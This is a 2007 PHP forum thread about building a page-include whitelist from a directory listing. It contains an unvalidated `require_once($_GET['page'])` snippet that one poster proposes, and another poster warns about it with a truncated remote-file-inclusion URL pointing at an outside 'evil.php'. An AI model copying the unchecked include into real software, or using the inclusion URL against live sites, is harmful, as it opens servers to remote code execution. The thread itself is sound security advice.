You are not logged in.

#1 2007-01-06 23:15:54

johnisevil
Member
From: Hamilton, ON Canada
Registered: 2003-08-07
Posts: 221
Website

PHP question

I'm using the following PHP code to handle navigation on a site I'm designing:

  $pages = array('clients', 'contact', 'informationservices', 'portfolio', 'thankyou');
  if(in_array($_GET['page'], $pages)) {
    @ require_once($_GET['page'].'.php');
  }
  elseif(!isset($_GET['page'])) {
    @ require_once('informationservices.php');
  }

How would I make it so that instead of having to manually list the pages used on the site in the pages array, I could automatically have PHP figure out what .php files are in $DOCUMENT_ROOT and have them inserted into the array?

Offline

#2 2007-01-06 23:57:16

rab
Member
Registered: 2006-06-15
Posts: 185

Re: PHP question

function dir_files_to_array( $path = './' ) {
    $nocount = array( "secretfile.php", "my_porn.txt" );
    $files = array();
    
    if( $handle = opendir($path) )
        while( false !== ($file = readdir($handle)) )
            if( !in_array($file, $nocount) && !is_dir($file) )
                $files[] = $file;
                    
   closedir($handle);

return $files;
}

print_r(dir_files_to_array()); print "n";

rawr

Offline

#3 2007-01-07 16:14:42

johnisevil
Member
From: Hamilton, ON Canada
Registered: 2003-08-07
Posts: 221
Website

Re: PHP question

The solution was so easy that it's almost stupid.  I changed what I pasted above to the following:

if($_GET['page']) {
    @ require_once($_GET['page'].'.php');
  }
  elseif(!isset($_GET['page'])) {
    @ require_once('informationservices.php');
  }

Offline

#4 2007-01-07 16:19:23

RedShift
Member
From: Belgium
Registered: 2004-07-16
Posts: 230

Re: PHP question

This poses a security threat, you were better off with your first code, it checks if file x is allowed to be included.


:?

Offline

#5 2007-01-07 21:33:00

rab
Member
Registered: 2006-06-15
Posts: 185

Re: PHP question

johnisevil wrote:

The solution was so easy that it's almost stupid.  I changed what I pasted above to the following:

if($_GET['page']) {
    @ require_once($_GET['page'].'.php');
  }
  elseif(!isset($_GET['page'])) {
    @ require_once('informationservices.php');
  }

http://hackme.org/index.php?page=http:/ … t/evil.php?

Use the function I posted...


rawr

Offline

#6 2007-01-07 22:38:43

johnisevil
Member
From: Hamilton, ON Canada
Registered: 2003-08-07
Posts: 221
Website

Re: PHP question

RedShift wrote:

This poses a security threat, you were better off with your first code, it checks if file x is allowed to be included.

Is there a way where I could make it ignore certain files that I don't want to be accessed?

Offline

#7 2007-01-07 22:41:14

RedShift
Member
From: Belgium
Registered: 2004-07-16
Posts: 230

Re: PHP question

johnisevil wrote:
RedShift wrote:

This poses a security threat, you were better off with your first code, it checks if file x is allowed to be included.

Is there a way where I could make it ignore certain files that I don't want to be accessed?

Have a look at rab's code.


:?

Offline

#8 2007-01-07 23:40:26

rab
Member
Registered: 2006-06-15
Posts: 185

Re: PHP question

function dir_files_to_array( $path = './' ) { 
    $noinclude = array( "secretfile.php", "my_porn.txt" ); 
    // Files in this array  will not be returned
    $files = array(); 
     
    if( $handle = opendir($path) ) 
       while( false !== ($file = readdir($handle)) ) 
          if( !in_array($file, $noinclude) && preg_match("/.php$/",$file) ) 
             $files[] = $file; 
                 
    closedir($handle); 
 
 return $files; 
 } 
 

if( in_array($_GET['page'], dir_files_to_array()) )
    include $_GET['page'];
else 
    include "index.php";

Example usage


rawr

Offline

Board footer

Powered by FluxBB